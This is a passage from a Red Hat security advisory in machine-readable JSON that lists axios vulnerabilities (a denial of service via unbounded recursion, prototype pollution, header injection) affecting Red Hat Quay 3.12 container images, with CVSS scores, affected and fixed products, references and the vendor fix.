            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "axios: Axios: Arbitrary HTTP header injection via prototype pollution"
    },
    {
      "cve": "CVE-2026-42039",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-04-24T19:01:44.887156+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461630"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client for browsers and Node.js. This vulnerability occurs because the `toFormData` function recursively processes nested objects without a depth limit. A remote attacker can exploit this by sending deeply nested request data, which causes the Node.js process to crash due to a RangeError, leading to a potential Denial of Service (DoS) if the process crashes.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461630",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461630"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42039",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9"
        }
      ],
      "release_date": "2026-04-24T18:01:30.775000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data"
    },
    {
      "cve": "CVE-2026-42041",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T19:01:41.034289+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
